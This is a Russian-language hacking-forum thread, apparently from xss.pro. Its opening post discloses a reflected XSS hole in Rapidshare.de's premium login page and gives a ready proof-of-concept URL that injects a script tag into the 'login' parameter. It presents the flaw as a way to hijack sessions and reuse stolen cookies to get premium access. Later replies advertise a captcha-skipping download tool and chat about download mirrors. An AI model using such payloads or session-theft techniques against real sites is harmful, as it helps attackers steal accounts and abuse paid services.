• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: Rapidshare

Отслеживать
Winux

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
XSS на rapidshare

Программа: сервис Rapidshare.de
Описание: XSS уязвимость поможет злоумышленнику перехватить сессию и подставить кукис, дабы юзать премиум аккаунт на Rapidshare.

Пример:
Код: 
https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=<script>alert('please visit xss.pro/')</script>&password=anything

:zns2: Rapidshare
 
Уже заштопали???Вот голодранцы
 
Один из лучших потрошителей файлхостинга Rapidshare.de. Программа одинаково удобная как для cчастливых обладателей Premium аккаунтов, так и для нормальных людей. Не надо теперь вводить разноцветные буквы, хорошо выполненная пакетная загрузка с рапиды, возможность после окончания загрузки автоматически вернуться к докачиванию неудачных, оборваных загрузок.
rapidshare.de_t.gif
:zns5: Скачать|Download
 
Так ведь у кнопки есть нтмл код,а можно ли как нить его заменить на свой?или там перенастроить качалки,чтобы они когда скачивают могли сначала с альфы, а патом с омеги сливать?
 
Не ты не так меня понял...в качалке же есть поддержка зеркал?вот допустим ты альфы час сливаешь,альфу на некоторое время тебе отрубают а ты продолжаешь скачавить тот же файлик но уже с омеги
 
сцылка перекрывается сразу и там и там(на альфе и на омеге)
[mod][N1TR0X:] тема двухмесячной давности.[/mod]
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх